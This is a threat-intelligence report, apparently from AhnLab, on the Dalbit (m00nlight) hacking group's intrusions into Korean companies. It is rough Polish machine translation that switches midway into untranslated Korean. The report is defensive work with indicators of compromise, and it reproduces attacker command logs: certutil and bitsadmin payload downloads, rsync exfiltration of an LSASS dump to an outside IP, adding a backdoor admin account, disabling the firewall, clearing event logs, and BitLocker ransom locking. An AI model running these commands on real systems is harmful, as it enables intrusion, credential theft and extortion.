AhnLab
Wysłane przez kingkimgim , 31 stycznia 2023 r
Dalbit (m00nlight): kampania ataków APT chińskiej grupy hakerów
0. Przegląd
Treść jest rozszerzeniem bloga „Attack Group using FRP (Fast Reverse Proxy) Targeting Domestic Companies”, który został opublikowany 16 sierpnia 2022 r. i śledzi działania grupy.
źródlo: https://asec.ahnlab.com/ko/46431/
Grupa atakująca przy użyciu FRP (Fast Reverse Proxy) na koreańskie firmy – ASEC BLOG
Spis treści1. Powłoka internetowa ASP. ASPXSpy2. Podniesienie uprawnień 2.1. Ziemniak2.2. Luka w zabezpieczeniach (exploit) 3. Proxy i przekierowanie portów 3.1. FRP3.2. HTran(LCX)4. Przypadki infekcji ransomware (BitLocker) W ostatnich latach krajowe firmy były często zaangażowane w naruszenia bezpieczeństwa, w których atakujący infiltruje, zaczynając od odsłonięcia podatnego serwera na zewnątrz i przejmuje kontrolę nad siecią wewnętrzną. Przypadki ataków wymierzonych w podatne serwery Atlassian Confluence Podatność Meterpretera na podatne serwery w krajowych placówkach medycznych…
Grupa ta korzystała głównie z narzędzi open source od przeszłości do chwili obecnej i brakowało jej wyraźnych cech profilowania ze względu na brak informacji, takich jak PDB. Ponadto serwer C2 (Command & Control) nadużył serwera krajowej firmy, a informacje, które można było zebrać, były ograniczone, gdyby ofiara nie zażądała osobnego dochodzenia. Jednak po opublikowaniu bloga i zablokowaniu niektórych krajowych serwerów korporacyjnych wykorzystywanych przez osobę atakującą osoba atakująca zaczęła wykorzystywać serwer hostingowy o nazwie „*.m00nlight.top” jako serwer C2 i serwer pobierania. Dlatego ASEC nazywa tę grupę Dalbit (m00nlight.top) od angielskiego słowa „Moonlight” oznaczającego „światło księżyca”.
Potwierdzono, że grupa próbowała zaatakować ponad 50 koreańskich firm od 2022 roku do chwili obecnej. Firmy, które zostały dotychczas zaatakowane, to głównie małe i średnie firmy oraz niektóre duże firmy.W szczególności potwierdzono, że 30% zainfekowanych firm korzysta z określonego rozwiązania oprogramowania do pracy grupowej w Korei. Obecnie trudno jednoznacznie stwierdzić, czy w oprogramowaniu do pracy grupowej występuje luka, ale jeśli serwer wystawiony na zewnątrz jest podatny na ataki, może to doprowadzić do wycieku wewnętrznych tajemnic i oprogramowania ransomware, co może mieć ogromny wpływ na firmę. Ponadto ta grupa Dalbit ustawia niektóre z zainfekowanych firm jako serwery proxy i serwery pobierania oraz jest wykorzystywana jako łącze atakującego podczas infiltracji innej firmy.
W związku z tym, jeśli istnieje podejrzenie ataku grupy Dalbit, konieczne wydaje się przeprowadzenie wewnętrznej kontroli bezpieczeństwa, a w celu zapobieżenia potencjalnym szkodom wtórnym i innym szkodom korporacyjnym należy zgłosić się do AhnLab, aby mogła zareagować zapobiegawczo.
1. Krajowe firmy represjonowane (klasyfikacja branżowa)
W sumie 50 firm, które zostały zidentyfikowane jako ofiary od 2022 r. do chwili obecnej, są następujące. Firmy, których nie można jednoznacznie zidentyfikować, są wykluczone z listy i szacuje się, że dotkniętych firm jest więcej.
[Rysunek 1] Branże firm zaatakowanych przez grupę Dalbit
Opis każdej klasyfikacji jest następujący.
Technologia: firma zajmująca się oprogramowaniem lub sprzętem
Przemysłowe: Producent maszyn, farb, stali i metalu
Chemia: kosmetyki, farmaceutyki, tworzywa sztuczne itp.
Budownictwo: Firmy budowlane lub stowarzyszenia lub organizacje związane z budownictwem
Motoryzacja : Producenci powiązani z motoryzacją
Półprzewodniki : Producenci powiązani z półprzewodnikami
Edukacja: firma edukacyjna
Hurt: hurtownik
Media: firmy drukarskie i medialne
Jedzenie: biznes spożywczy
Wysyłka: firma transportowa
Gościnność: firmy zajmujące się wypoczynkiem lub firmy zajmujące się kwaterami turystycznymi
Energia: Firmy energetyczne
Przemysł stoczniowy: Przemysł stoczniowy
Doradztwo : Firma zajmująca się doradztwem w zakresie zarządzania
2. Przepływ i charakterystyka
2.1. Podsumowanie
[Rysunek 2] Podsumowanie naruszenia przez Dalbit Group
Powyższy rysunek przedstawia proces, w którym osoba atakująca naraża Firmę B. Krótkie wprowadzenie do przepływu jest następujące.
1) Początkowy dostęp
Atakujący próbuje kontrolować system za pomocą narzędzi, takich jak powłoka sieciowa, po uzyskaniu dostępu do systemu za pomocą luk w zabezpieczeniach serwerów WWW lub serwerów SQL. 2) Pobierz kilka narzędzi hakerskich za pośrednictwem powłoki internetowej
Command & Control .
Narzędzia hakerskie obejmują kilka plików binarnych, w tym narzędzia do zwiększania uprawnień, narzędzia proxy i narzędzia do skanowania sieci.
3) Proxy & Internal Reconnaissance
Proxy: Atakujący instaluje narzędzie proxy, takie jak FRP (Fast Reverse Proxy), a następnie 2-1) serwer hostingowy zbudowany przez atakującego lub 2-2) serwer innej firmy (Firma A), która został zainfekowany Próbuje połączyć się z pulpitem zdalnym (RDP) przez
Rekonesans wewnętrzny: Rekonesans wewnętrzny i pozyskiwanie informacji za pomocą narzędzi do skanowania sieci i narzędzi do przejmowania kont.
4) Ruch
poprzeczny Przenosi do innego serwera lub komputera, który można połączyć za pomocą uzyskanych informacji. Następnie narzędzie proxy (FRP) jest instalowane na komputerze, na którym ruch boczny zdołał skonfigurować środowisko, w którym osoba atakująca może uzyskać dostęp do protokołu RDP, a niezbędne uprawnienia uzyskuje się, dodając określone konto lub używając narzędzia do kradzieży danych uwierzytelniających, takiego jak Mimikatz .
5) Wpływ
Wreszcie, jeśli atakujący ukradł wszystkie potrzebne mu informacje, blokuje określony dysk za pomocą funkcji BitLocker i żąda pieniędzy.
[Tabela 1] Podsumowanie opisu naruszenia
Główne cechy grupy Dalbit są następujące.
2.2. Cechy Dalbita
Lista opisane
Atakujący serwer C2 Pobieranie i serwer C2 (Command&Control):
Ponad połowa krajowych serwerów korporacyjnych lub serwerów hostingowych nadużywa krajowych serwerów korporacyjnych Serwery
hostingowe używają głównie *.m00nlight.top lub adresu IP.
Próba kontroli RDP Po infekcji próbuje głównie
uzyskać dostęp RDP Użyj narzędzia proxy lub Gotohttp do połączenia RDP
narzędzie proxy Oprócz FRP i LCX (Htran) główne narzędzia proxy używają NPS i ReGeorg .
Dodaj konto użytkownika Dodatkowe informacje o koncie za pomocą polecenia net
( ID : 'main' / PW : 'ff0.123456' )
narzędzia open source Korzystanie z narzędzi typu open source, z których większość jest łatwo dostępna dla każdego,
zwłaszcza wiele narzędzi napisanych w języku chińskim.
uchylanie się Użyj produktów VMProtect, aby ominąć narzędzia hakerskie i diagnostykę Usuwanie
dziennika zdarzeń bezpieczeństwa
kradzież informacji Informacje o koncie użytkownika Informacje e-
Przeciek ekranu Informacje o
zainstalowanym programie
[Tabela 2] Cechy Dalbita
3. Stosowane narzędzia i proces naruszenia
3.1. Narzędzia użytkowe i złośliwe oprogramowanie
powłoka internetowa program do pobierania podwyższenie uprawnień pełnomocnik rekonesans wewnętrzny
Godzilla
ASPXSpy
AntSword
China Chopper Certutil (Windows CMD)
Bitsadmin (Windows CMD) BadPotato
JuicyPotato
SweetPotato
RottenPotato
EFSPotato
CVE-2018-8639
CVE-2019-1458 FRP
LCX
NPS
ReGeorg FScan
NbtScan
TCPScan
Goon Nltest
(Windows CMD)
ruch boczny Zbieranie i wyciek informacji tylne drzwi szyfrowanie plików uchylanie się
RDP
PsExec
RemCom
Wineexec Wevtutil (Windows CMD)
WMI (Windows CMD)
ProcDump
Dumpert
EML Extractor (przez
Mimikatz
Rsync ) CobaltStrike
MetaSploit
BlueShell
Ladon BitLocker
(Windows CMD) Zabezpieczenia Usuwanie dziennika (Windows CMD)
Zapora wyłączona (Windows CMD)
Próba usunięcia produktu antywirusowego
VMProtect Packing
[Tabela 3] Złośliwe kody i narzędzia hakerskie wykorzystywane przez Dalbit
Jedno narzędzie stworzone przez atakującego wydaje się wyciekać wiadomości e-mail, a reszta korzystała z normalnych programów systemu Windows lub narzędzi, które można łatwo uzyskać podczas wyszukiwania.
3.2. proces o naruszenie
3.2.1. wczesna penetracja
Przypuszcza się, że celem ataku jest serwer z określonym oprogramowaniem do pracy grupowej zainstalowanym w Korei, podatny na ataki serwer WWW, serwer pocztowy (Exchange Server) i serwer SQL. Atakujący wykorzystał luki w zabezpieczeniach WebLogic, takie jak CVE-2017-10271 lub luki w zabezpieczeniach przesyłania plików, aby przesłać WebShell, a niektóre wydają się używać wiersza polecenia programu SQL Server (xp_cmdshell).
Powłoki sieciowe wykorzystywane przez osoby atakujące to Godzilla, ASPXSpy, AntSword i China Chopper w kolejności. Godzilla była używana najczęściej, a także zidentyfikowano kilka innych powłok sieciowych.
Ścieżka zainstalowanej powłoki internetowej jest następująca.
– Rekrutacja personelu (luka umożliwiająca przesyłanie plików)
D:\WEB\********recruit\css\1.ashx
D:\WEB\********recruit\css\4.ashx
D: \WEB\********recruit\common\conf.aspx
.. .
– Luka w zabezpieczeniach związana z przesyłaniem plików
D:\UploadData\***********\****_File\Data\Award\1.ashx
D:\UploadData\*********** \****_File\Data\Award\2.aspx
D:\UploadData\************\****_File\Data\Award\3.aspx
D:\** Usługa sieci Web\*******\********Edytor\przykład\photo_uploader\File\conf.aspx
D:\**Usługa sieci Web\********_Submission\Include\file . aspx
.. .
– Określone oprogramowanie do pracy grupowej
D:\Web\(groupware)\cop\1.ashx
D:\Web\(groupware)\app\4.ashx
D:\Web\(groupware)\bbs\4.asmx
D:\Web\ (Oprogramowanie do pracy grupowej)\erp\tunnel.aspx (ReGeorg)
D:\inetpub\(Oprogramowanie do pracy grupowej)\image\2.asmx
D:\inetpub\(groupware)\image\2.aspx
C:\(groupware)\Web\(groupware)\cop\conf.aspx
C:\(groupware)\Web\(groupware)\cop\1.ashx
C:\(oprogramowanie do pracy grupowej)\Web\(oprogramowanie do pracy grupowej)\cop\1.asmx
C:\(oprogramowanie do pracy grupowej)\Web\(oprogramowanie do pracy grupowej)\cop\1.aspx
…
– Serwer pocztowy ( Exchange Server )
D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\aa.aspx
D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\ auth\11.aspx
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Tymczasowe pliki ASP.NET\root\91080f08\2694eff0\app_web_defaultwsdlhelpgenerator.aspx.cdcab7d2.sjx_41yb.dll
C:\Windows\Microsoft.NET\ Framework64\v4.0.30319\Tymczasowe pliki ASP.NET\root\91080f08\2694eff0\app_web_ldaj2kwn.dll
…
– Weblogic D:\***\wls1035\domains\************\servers\*******\tmp\************\uddiexplorer \gcx62x\war\modifyregistryhelp.jsp
D:\***\wls1035\domains\************\servers\*******\tmp\***** ******\wls-wsat\zfa3iv\war\eee.jsp
D:\***\wls1035\domains\************\servers\***** *\tmp\************\wls-wsat\zfa3iv\war\error.jsp
D:\Oracle\***********\user_projects\domains\** **********\servers\WLS_FORMS\tmp\************\wls-wsat\tcsxmg\war\123.jsp
D:\Oracle\*** *******\user_projects\domains\***************\servers\WLS_FORMS\tmp\************\wls-wsat \tcsxmg \war\test.jsp D:\Oracle\***********\user_projects\domains\*************\servers\WLS_FORMS\tmp\** **********\wls-wsat\tcsxmg\war\aaa.jsp
…
– Tomcat
C:\(Tomcat)\webapps\dd\sb.jsp
C:\(Tomcat)\webapps\ddd\index.jsp
C:\(Tomcat)\webapps\docs\update.jsp
C:\(Tomcat)\webapps\tmp\shell.jsp
[Tabela 4] Ścieżka, do której ładowana jest powłoka WWW
3.2.2. Pobierać
Atakujący pobiera inne narzędzia hakerskie za pomocą domyślnie zainstalowanych normalnych programów systemu Windows. Ponieważ powłoka internetowa jest zwykle używana do infiltracji, z wyjątkiem procesów poleceń, takich jak cmd, procesy nadrzędne są wykonywane przez procesy serwera sieciowego, takie jak w3wp.exe, java.exe, sqlserver.exe i tomcat*.exe. Pobrane pliki otrzymują pliki potrzebne atakującemu, takie jak narzędzia do podnoszenia uprawnień, narzędzia proxy i narzędzia do skanowania sieci. Polecenie pobierania jest następujące.
(Dla porównania, w przypadku nadużywania krajowego serwera korporacyjnego adres nie jest w pełni ujawniany.)
1) Certutil
> certutil -urlcache -split -f hxxp://www.ive***.co[.]en/uploadfile/ufaceimage/1/update.zip c:\programdata\update.exe (frpc)
> certutil -urlcache - split -f hxxp://121.167.***[.]***/temp/8.txt c:\programdata\8.ini (frpc.ini)
> certutil -urlcache -split -f hxxp://103.118 .42[.]208:8080/frpc.exe frpc.exe
…
[Tabela 5] Dziennik pobierania Certutil
2) Bitsadmin
> bitsadmin /transfer mydownloadjob /download /priority normal “ hxxp://91.217.139[.]117:8080/calc32.exe ” “c:\windows\debug\winh32.exe” (frpc)
> bitsadmin /transfer mydownloadjob / download /priority normal „ hxxp://91.217.139[.]117:8001/log.ini ” „c:\windows\debug\log.ini” (frpc.ini)
…
[Tabela 6] Dziennik pobierania Bitsadmin
Narzędzia hakerskie i złośliwe kody pobierane przez osoby atakujące były identyfikowane głównie w następujących ścieżkach.
%ALLUSERSPROFIL%
%SystemDrive%\temp
%SystemDrive%\perflogs
%SystemDrive%\nia
%SystemDrive%\.tmp
%SystemRoot%
%SystemRoot%\debug
%SystemRoot%\temp
[Tabela 7] Główny katalog używany przez grupę Dalbit
Dlatego w przypadku podejrzenia naruszenia konieczne jest sprawdzenie pliku w odpowiedniej ścieżce.
3.2.3. Podnieś uprawnienia i dodaj konta
Atakujący używają głównie Potato (BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato) i POC (CVE-2018-8639, CVE-2019-1458) opublikowanych na Github w celu eskalacji uprawnień. Charakteryzuje się dodaniem następującego konta po podniesieniu uprawnień.
Sp.exe poniżej to narzędzie SweetPotato.
> sp.exe „whaomi” (sprawdź uprawnienia)
> sp.exe „netsh advfirewall wyłącz stan wszystkich profili” (zapora wyłączona)
> sp.exe „użytkownik sieciGłównyff0.123456 /add & net localgroup administrators main /add” (dodaj konto)
[Tabela 8] Logi przy użyciu SweetPotato
Interesującą częścią do obejrzenia jest nazwa konta dodana przez atakującego. Potwierdza to również konto atakującego „główne” w innych firmach naruszających prawo.
Oprócz dodawania kont, atakujący wykorzystał również przejęte konta administratorów.
> wmic /node:127.0.0.1 /user:storadmin /password:r*****1234!@#$ wywołanie procesu utwórz „cmd.exe /cc:\temp\s.bat”
[Tabela 9] Dziennik wykonania konta administratora
3.2.4. ustawienia proxy
Po infiltracji serwera atakujący uzyskuje do niego dostęp za pośrednictwem serwera proxy w celu wykorzystania komunikacji RDP. FRP i LCX były używane głównie jako narzędzia proxy, a ReGeorg , NPS lub RSOCKS zostały również potwierdzone w niektórych firmach. Ponadto kilka narzędzi proxy, takich jak FRP i LCX, zostało zidentyfikowanych w jednym miejscu w określonej firmie naruszającej prawa, a wiele plików konfiguracyjnych FRP (. Uważa się, że gdy wśród dostępnych komputerów jest wiele ofiar, atakujący dodatkowo instaluje FRP i wykorzystuje dużą liczbę plików konfiguracyjnych. Ponadto używany przez grupę LCX ma te same funkcje, co open source, ale zamiast wersji opublikowanej na Githubie zastosowano arbitralnie skompilowane chińskie pliki binarne.
Istnieją różnice w metodach przekazywania i protokołach obsługiwanych przez narzędzia proxy, takie jak FRP i LCX. Ponieważ jednak raport TI „Raport z analizy przypadków ataków wykorzystujących różne narzędzia do zdalnego sterowania ” wyjaśnia różnicę, rzeczywiste przypadki infekcji oraz odtwarzane i sieciowe pakiety, ten artykuł nie wspomina o tej części osobno.
1) FRP (SZYBKIE ODWROTNE PROXY)
W przypadku przejęcia przez tę grupę pliki konfiguracyjne FRP (.ini) zostały zidentyfikowane zarówno na serwerze, jak i na urządzeniu PC. Poniżej znajduje się przykład rzeczywistej firmy naruszającej zasady.
[Rysunek 3] Plik konfiguracyjny FRPC (m00nlight.top) znaleziony w firmie naruszającej prawo
W szczególności grupa Dalbit komunikowała się głównie za pomocą protokołu Socks5. Protokół Socks5 jest protokołem piątej warstwy 7. warstwy OSI i może obsługiwać różne żądania, takie jak HTTP, FTP i RDP, ponieważ znajduje się między 4. a 7. warstwą. W związku z tym, jeśli atakujący użyje narzędzia połączenia proxy, takiego jak Proxifier, które może obsłużyć Socks5 na serwerze atakującego, możliwa jest zdalna kontrola przez RDP, a jeśli możliwe jest połączenie z wewnętrznym komputerem PC, można również wykonać ruch boczny. Innymi słowy, jeśli ustawisz plik konfiguracyjny na protokół Socks5, masz większą swobodę, ponieważ możesz obsłużyć wiele żądań bez dalszych modyfikacji.
[Rysunek 4] Przykład użycia Socks5
Poniżej znajdują się nazwy plików FRP i polecenia użyte przez atakującego. Poniżej wymieniono te najczęściej używane.
Nazwa pliku FRP
update.exe
debug.exe
main.exe
info.exe
Agent.exe
frpc.exe
test.exe
zabbix.exe
winh32.exe
cmd.exe
[Tabela 10] Nazwy plików FRP
Komenda FRP
> update.exe -c frpc.ini
> update.exe -c 8080.ini
> update.exe -c 8.ini
> info.zip -c frpc__8083.ini
> debug.exe -c debug.ini
> debug.exe - c debug.log
> debug.exe -c debug.txt
> frpc.exe -c frpc__2381.ini
> cmd.exe /cc:\temp\****\temp\frpc.ini
…
[Tabela 11] Dziennik wykonania FRP
Ponadto niektóre firmy zachowywały wytrwałość, rejestrując FRP w harmonogramie zadań (schtasks) pod nazwą „debug”. Potwierdzono, że zarejestrowany harmonogram został wykonany w następujący sposób.
> schtasks /tn debug /run
[Tabela 12] Dziennik wykonywany przez Harmonogram zadań
2) LCX (HTRAN)
Dalbit użył pliku binarnego LCX (Htran) skompilowanego przez pewnego Chińczyka. Ma to taką samą funkcję jak istniejący plik binarny , ale określony jest pseudonim twórcy pliku binarnego.
[Rysunek 5] Uruchamianie LCX używane przez grupę Dalbit (autor: 折羽鸿鹄)
Osoba, która utworzyła plik binarny, jest identyfikowana jako „折羽鸿鹄” (QQ:56345566). Jest bardzo mało prawdopodobne, aby ten autor był atakującym, ale ponieważ tego pliku binarnego nie można pobrać po prostu przez wyszukiwanie, przypuszcza się, że atakujący ma powiązania z Chinami.
Zainstalowana nazwa pliku i wykonanie są następujące.
Nazwa pliku LCX
lcx3.exe
lcx.exe
aktualizacja.exe
[Tabela 13] Nazwy plików LCX
Komenda LCX
> update.exe -slave 1.246.***.*** 110 127.0.0.1 3389
> lcx3.exe -slave 222.239.***.*** 53 127.0.0.1 3389
…
[Tabela 14] Dziennik poleceń LCX
Powyższy LCX C2 to serwer firmy krajowej, dlatego oznaczony jest maskowaniem.
3.2.5. rekonesans wewnętrzny
Narzędzia Fscan i NBTScan były powszechnie używane do skanowania sieci, aw niektórych przypadkach zidentyfikowano TCP Scan i Goon.
Goon to narzędzie do skanowania sieci wykonane z Golang, które może skanować konta Tomcat, MSSQL i MYSQL, a także podstawowe skanowanie portów. Możesz również potwierdzić, że narzędzie jest również wykonane w języku chińskim.
[Rysunek 6] Ekran podczas uruchamiania Goon
3.2.6. kradzież informacji
Głównymi informacjami kradnącymi są informacje LSASS Dump oraz plik EML konkretnego konta.W zależności od firmy potwierdzono, że program zainstalowany za pomocą polecenia WMIC jest sprawdzany lub obraz ekranu jest wysyłany na serwer osoby atakującej w regularnych odstępach czasu z komputera konkretnej ofiary.
1) WYODRĘBNIJ DANE UWIERZYTELNIAJĄCE (ZRZUT LSASS)
Osoba atakująca próbowała wyodrębnić informacje uwierzytelniające bez instalowania Mimikatz zgodnie z celem. Jest to metoda zrzutu procesu Lsass.exe.Ponieważ ten plik zrzutu zawiera informacje uwierzytelniające, narzędzia takie jak Mimikatz lub Pypykatz mogą uzyskać informacje uwierzytelniające komputera. Szczegółowe informacje na temat Mimikatz można znaleźć w raporcie TI „Raport z analizy technik propagacji w sieci wewnętrznej przy użyciu Mimikatz ”.
Metoda atakującego polegająca na kradzieży danych uwierzytelniających bez Mimikatz jest następująca.
1-1) Wywrotka
Open source Dumpert to narzędzie, które omija API hooking i działa zgodnie z wersją systemu operacyjnego, zrzuca proces lsass.exe za pomocą API MiniDumpWriteDump(). Atakujący zmodyfikował kod, aby zmienić ścieżkę pliku zrzutu i usunąć funkcję wyjścia dziennika.
[Rysunek 7] Lewy (Dumpert open source) vs Prawy (Dumper używany przez grupę Dalbit)
Na powyższym obrazku w przypadku prawej strony widać, że ścieżka i ciąg wyjściowy są takie same, poza tym, że zostały usunięte.
Wszystkie dotychczas potwierdzone ścieżki plików zrzutu to „%SystemRoot%\temp” i są następujące.
%SystemRoot%\temp\duhgghmpert.dmp
%SystemRoot%\temp\dumpert.dmp
%SystemRoot%\temp\tarko.dmp
%SystemRoot%\temp\lsa.txt
…
[Tabela 15] Ścieżka pliku zrzutu Lsass
1-2) Procdump
Narzędzie Procdump to normalny program narzędziowy dostarczony przez firmę Microsoft, który zapewnia funkcję zrzutu procesu. Atakujący wykonał zrzut za pomocą narzędzia w następujący sposób.
[Rysunek 8] Dane wyjściowe podczas wykonywania Procdump
Następnie atakujący wysłał plik zrzutu na serwer atakującego za pośrednictwem narzędzia o nazwie Rsync (Remote Sync). Poniżej znajduje się rzeczywisty przypadek atakującego próbującego ujawnić informacje.
> svchost.exe -accepteula -ma lsass.exe web_log.dmp
> rsync -avz –port 443 web_log.zip test@205.185.122[.]95::share/web_log.zip
[Tabela 16] Wykonanie i logowanie Procdump przy użyciu rsync
2) EKSTRAKCJA POCZTY
[Rysunek 9] Uruchamianie narzędzia do wyodrębniania poczty
해당 샘플은 Golang으로 만들어진 메일 추출 도구로 현재 유일하게 공격자가 만든 도구로 추정되고 있다. 이는기업의 Exchange 메일 서버를 대상으로 EWS(Exchange Web Service)를 통해 특정 계정 메일을 EML파일로 추출하는 기능을 가지고 있다. 인자로는 Exchange 서버 주소와, 계정명, 해당 계정의 NTLM 패스워드 해시, 날짜 및 시간 등이 존재한다. 실행 시 해당 계정의 모든 메일함에서 인자로 받은 시간을 기준으로 모든 메일을 추출하여 EML 파일로 저장한다.
참고로 해당 바이너리의 PDB 정보는는 ‘fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff’로 무의미하다.
[그림 10] 메일 추출 도구의 PDF 정보
3) 화면 유출
공격자는 특정 PC의 화면을 공격자 서버로 송출하였다. 현재 화면을 캡쳐하는 바이너리가 확인되지 않았으나, 감염된 PC의 화면이 송출되는 공격자 서버가 확인되었다. 이는 5~10초 간격으로 특정 기업의 침해 PC의 화면이 송출되고 있었다.
공격자의 화면 송출 서버 : hxxp://91.217.139[.]117:8080/1.bat
[그림 11] 실제로 송출되었던 특정 기업의 피해 PC 화면
이는 온전히 이미지만 송출되었으며 원격으로 조종할 수 없고 오디오 등은 출력되지 않았다.
또한 화면이 송출되고 있던 공격자 서버(91.217.139[.]117)는 또 다른 기업에서 다운로드 서버로도 사용되고 있었다.
>certutil -urlcache -split -f hxxp://91.217.139[.]117:8080/calc32.exe
>certutil -split -urlcache -f hxxp://91.217.139[.]117:8443/log.ini c:\temp >bitsadmin /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8080/calc32.exe” “c:\windows\debug\winh32.exe” (frpc)
>bitsadmin /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8001/log.ini” “c:\windows\debug\log.ini” (frpc.ini)
[표 17] 공격자 서버(91.217.139[.]117)의 다른 로그
4) 설치된 프로그램 조회 및 로그인 정보
공격자는 WMIC 명령어를 통해 설치된 프로그램을 확인하였다.
> wmic product get name,version
[표 18] 공격자가 설치된 프로그램을 조회한 방법
[그림 12] 설치된 프로그램 목록, 명령어 예시(WMIC)
또한 이벤트 로그 중 특정 이벤트 ID를 발생한 도메인 계정 정보에 대해 수집하였다. 생성된 파일은 c:\temp\EvtLogon.dat에 존재한다.
Event ID 의미
4624 로그인 성공
4768 커버로스 인증 요청
4776 NTLM 인증 시도
[표 19] 공격자가 사용한 이벤트 ID의 의미
> wevtutil qe security /q:”Event[System[(EventID=4624 or EventID=4768 or EventID=4776)]]” /f:text /rd:true >> c:\temp\EvtLogon.dat
[표 20] wevtutil 명령어 로그
3.2.7. 파일 암호화
해당 내용은 과거 블로그를 통해 자세히 소개되었다. 공격자는 윈도우 유틸리티인 BitLocker를 통해 특정 드라이브를 암호화하여 금액을 요구하였다. 현재 여러 피해 기업이 더 확인되고 있다.
BitLocker 명령어
> “C:\Windows\System32\BitLockerWizardElev.exe” F:\ T
> manage-bde -lock -ForceDismount F:
> manage-bde -lock -ForceDismount e:
> “c:\windows\system32\bitlockerwizardelev.exe” e:\ t
> “c:\windows\system32\bitlockerwizardelev.exe” f:\ u
[표 21] BitLocker 로그
아래는 공격자가 사용하는 랜섬노트이다. 공격자는 startmail.com, onionmail.com과 같은 익명 메일 서비스를 이용하였다.
[그림 13] 이전 블로그에 소개된 랜섬노트
랜섬노트 다운로드로 추정되는 명령어는 다음과 같다.
> certutil -urlcache -split -f hxxp://175.24.32[.]228:8888/readme c:\windows\temp\readme
[표 22] 랜섬노트 다운로드로 추정되는 로그
3.2.8. 우회
1) VMPROTECT PACKING
공격자는 바이너리를 업로드 후 진단이 되었을 때 VMProtect로 패킹을 하여 진단 우회를 시도하였다.
– 권한 상승 도구
%ALLUSERSPROFILE%\badpotatonet4.exe
%ALLUSERSPROFILE%\BadPotatoNet4.vmp.exe
%ALLUSERSPROFILE%\SweetPotato.exe
%ALLUSERSPROFILE%\SweetPotato.vmp.exe
%ALLUSERSPROFILE%\jc.vmp.exe
%SystemDrive%\nia\juicypotato.vmp1.exe
%SystemDrive%\nia\juicypotato.vmp.exe
…
– 프록시 도구
E:\WEB\*****\data\frpc.vmp.exe
%ALLUSERSPROFILE%\lcx.exe
%ALLUSERSPROFILE%\lcx_VP.exe
%SystemDrive%\Temp\lcx.exe
%SystemDrive%\Temp\lcx_VP.exe
%SystemDrive%\Temp\svchost.exe (FRP)
%SystemDrive%\Temp\frpc.vmp.exe
…
[표 23] VMP로 패킹된 파일
2) WEVTUTIL을 이용한 윈도우 이벤트 로그 삭제
Security 이벤트 로그 삭제
> cmd.exe /c wevtutil cl security
Application 로그 삭제
> cmd.exe wevtutil.exe el
> cmd.exe wevtutil.exe cl “application”
[표 24] 윈도우 이벤트 로그 삭제
3) 방화벽 OFF
sp.exe “netsh advfirewall set allprofiles state off”
[표 25] 방화벽 OFF
4. 결론
달빗(Dalbit) 해킹 그룹은 국내 기업의 취약한 서버를 대상으로 공격을 시도하였으며 이는 중견 이하 업체뿐만 아니라 일부 대기업에서도 로그가 올라오고 있다. 특히 피해 기업 중 30%가 국내의 특정 그룹웨어 제품을 사용 중인 것으로 확인되었다. 또 해당 그룹은 침입 초기에 사용한 웹쉘부터 최종 단계인 랜섬웨어까지 누구나 쉽게 구할 수 있는 도구를 사용하고 있으며 이 중, 중국 커뮤니티에서 구한 것으로 추정되는 프록시 도구나 중국어로 설명된 도구 그리고 이 글에서 언급되지 않은 중국어 도구도 존재한다. 따라서 공격자는 중국어로 소개되는 도구를 주로 사용한 것으로 보아 중국과 일부 연관이 있을 것으로 추정된다.
서버 관리자는 감염 의심 시 이 글에서 소개된 공격자의 주 다운로드 경로와 주 계정명(‘main’) 그리고 IOC 등을 확인해야 하며, 만약 의심 징후 확인 시 안랩에 즉시 신고하여 2차 피해를 줄여야 할 것으로 보인다. 또한 관리자는 서버 구성 환경이 취약할 경우 최신 버전으로 패치해 기존 취약점을 사전 방지하며 외부에 공개된 서버 중 관리되지 않는 서버가 있다면 필히 점검해야 할 것으로 보인다.
5. IOC
참고로 ASEC 블로그에서는 공격자가 악용 중인 국내 기업 서버의 IP를 공개하지 않는다.
Mitre Attack
Execution Persistence Privilege Escalation Credential Access Discovery Defense Evasion Lateral Movement Collection Exfiltration Command and Control Impact Resource Development
– Command and Scripting Interpreter(T1059)
– Windows Management Instrumentation(T1047)
– System Service(T1569) – Scheduled Task/Job(T1053)
– Create Account(T1136)
– Server Software Component(T1505)
– Account Manipulation(T1098) – Access Token Manipulation(T1134)
– Exploitation for Privilege Escalation(T1068) – OS Credential Dumping (T1003) – Remote System Discovery(T1018)
– Network Service Discovery(T1046) – Impair Defenses(T1562)
– Indicator Removal(T1070) – Remote Services(T1021)
– Lateral Tool Transfer(T1570) – Data from Local System(T1005)
– Account Discovery: Email Account(1087.003)
– Email Collection(T1114)
– Screen Capture(T1113) – Exfiltration Over Web Service(T1567) – Proxy(T1090)
– Ingress Tool Transfer(T1105) – Data Encrypted for Impact(T1486) – Stage Capabilities: Upload Malware(T1608.001)
[표 26] Mitre Attack
진단명
WebShell/Script.Generic (2020.12.11.09)
WebShell/ASP.ASpy.S1361 (2021.02.02.03)
WebShell/ASP.Generic.S1855 (2022.06.22.03)
WebShell/ASP.Small.S1378 (2021.02.24.02)
WebShell/JSP.Godzilla.S1719(2021.12.03.00)
WebShell/JSP.Chopper.SC183868(2022.10.15.01)
WebShell/JSP.Generic.S1363 (2021.01.27.03)
Backdoor/Script.Backdoor (2015.01.04.00)
WebShell/JSP.Generic.S1956 (2022.11.14.00)
Trojan/Script.Frpc (2022.12.17.00)
JS/Webshell (2011.08.08.03)
HackTool/Win.Fscan.C5334550(2023.01.27.00)
HackTool/Win.Fscan.C5230904(2022.10.08.00)
HackTool/Win.Fscan.R5229026(2022.10.07.03)
Trojan/JS.Agent(2022.03.16.02)
Unwanted/Win32.TCPScan.R33304(2012.08.17.00)
HackTool/Win.Scanner.C5220929(2022.08.09.02)
HackTool/Win.SweetPotato.R506105 (2022.08.04.01)
Exploit/Win.BadPotato.R508814 (2022.08.04.01)
HackTool/Win.JuicyPotato.R509932 (2022.08.09.03)
HackTool/Win.JuicyPotato.C2716248 (2022.08.09.00)
Exploit/Win.JuicyPotato.C425839(2022.08.04.01)
Exploit/Win.SweetPotato.C4093454 (2022.08.04.01)
Trojan/Win.Escalation.R524707(2022.10.04.02)
Trojan/Win.Generic.R457163(2021.12.09.01)
HackTool/Win64.Cve-2019-1458.R345589(2020.07.22.06)
Malware/Win64.Generic.C3164061 (2019.04.20.01)
